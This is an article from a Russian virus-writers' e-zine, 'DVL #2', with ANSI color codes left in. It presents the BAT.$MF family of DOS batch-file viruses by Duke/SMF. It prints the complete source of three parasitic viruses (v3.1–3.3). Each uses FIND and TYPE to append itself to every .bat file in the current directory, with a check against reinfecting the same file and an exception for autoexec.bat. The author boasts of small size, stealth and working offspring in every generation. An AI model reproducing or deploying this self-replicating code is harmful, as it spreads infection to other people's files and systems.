
[0;1;35m                                D V L  # 2

[33m                         Семейство вирусов BAT.$MF
                              (c) by Duke/SMF

[34m
Автором всех вирусов этого семейства является Duke/SMF.
Деление вирусов на версии производится по следующему правилу:
v1.x [37m- вирусы со вставками ASM'а или скриптов
[34mv2.x [37m- компаньон вирусы
[34mv3.x [37m- попытки написать самый короткий паразитический вирус,
       использование find
[34mv4.x [37m- вирусы-черви
[34mv5.x [37m- паразитические вирусы, использование type
На настоящий момент с семейство входит более 10 вирусов.

[36m********************************************************************
[31mИмя вируса     : BAT.$MF v3.1
Дата создания  : 06.09.98
Длина вируса   : 350 байт (с учетом пустых строк в конце файла,
                 для "круглой" длины)
[36m===== Cut here =====
[0;37m@echo off
if "%1=="$MF goto $MFz
echo. >$MF.bat
echo @echo off>>$MF.bat
find "$MF">$MF.bat
echo echo on>>$MF.bat
for %%b in (*.bat) do call $MF.bat $MF %%b
del $MF.bat>nul
goto $MFe
:$MFz
if "%2=="autoexec.bat goto $MFe
find "$MF"nul
if not errorlevel 1 goto $MFe
type $MF.bat>>%2
rem BAT.$MF 3.1 by Duke/$MF
:$MFe
echo on

[1;36m===== Cut here =====
[36m********************************************************************
[31mИмя вируса     : BAT.$MF v3.2
Дата создания  : 10.09.98
Длина вируса   : 278 байт
Прирост файлов : 282 байт (за счет добавления двух пар #10#13)
[36m===== Cut here =====
[0;37m@echo off
if "%1=="@ goto $&z
echo.>$&.bat
echo @echo off>>$&.bat
find "$&">$&.bat
for %%b in (*.bat) do call $&.bat @ %%b
del $&.bat
goto $&
:$&z [$MF 3.2, Duke/SMF]
if "%2=="autoexec.bat goto $&
find "$&"nul
if not errorlevel 1 goto $&
type $&.bat>>%2
:$&
[1;36m===== Cut here =====
[36m********************************************************************
[31mИмя вируса     : BAT.$MF v3.3
Дата создания  : 07.10.98
Длина вируса   : 245 байт
Прирост файлов : 249 байт (за счет добавления двух пар #10#13)

[34mЭтот вирус претендует на звание "Самый маленький в мире BAT-вирус,
написанный только на DOS-командах" :)
[36m===== Cut here =====
[0;37m@echo off %$&%
if "%1=="@ goto $&z
echo.>$&.bat
find "$&">$&.bat
for %%b in (*.bat) do call $&.bat @ %%b
del $&.bat
goto $&
:$&z [$MF 3.3,Duke/SMF]
if "%2=="autoexec.bat goto $&
find "$&"nul
if errorlevel 1 type $&.bat>>%2
:$&
[1;36m===== Cut here =====
[36m********************************************************************

[34mПреимущества вирусов семейства BAT.SMF v3.x над другими BAT-вирусами:
[37m
  1. Не содержат вставок на асемблере - только DOS команды!
  2. Малая длина вирусов - 350 и 278 байт. Это одни из самых маленьких
     BAT-вирусов в мире!
  3. Проверка на повторное заражение.
  4. Не выдают посторонних надписей на экран.
  5. Не оставляют после себя ненужных файлов.
  6. Пораженные файлы сохраняют полную работоспособность.
  7. Потомки вирусов работоспособны во всех поколениях.
  8. Проверяет и не поражает AUTOEXEC.BAT
  9. Состоят из одного файла и не требуют инсталляции.
 10. В вирусах используются редко встречающиеся метки.

********************************************************************

[34mОбщая характеристика вирусов семейства BAT.SMF v3.x :
[37m
Неопасные, файловые, паразитические BAT-вирусы. Для размножения  используют
команду FIND. Поражают BAT-файлы в текущем каталоге. Поражение  производит-
ся в конец файла. Не поражают файл autoexec.bat (по причине не  возвращения
им при загрузке системы нулевого параметра командной  строки).  При  отсут-
ствии утилиты FIND в каталогах PATH перестают корректно работать. Все пред-
ставленные вирусы работают по одному алгоритму, уменьшение  длины  в  новых
версиях происходит за счет оптимизации кода, а не в ущерб качеству.

  Исходные тексты вы можете взять в файле "dvl2-04a.zip"
[1;35m                            The End of File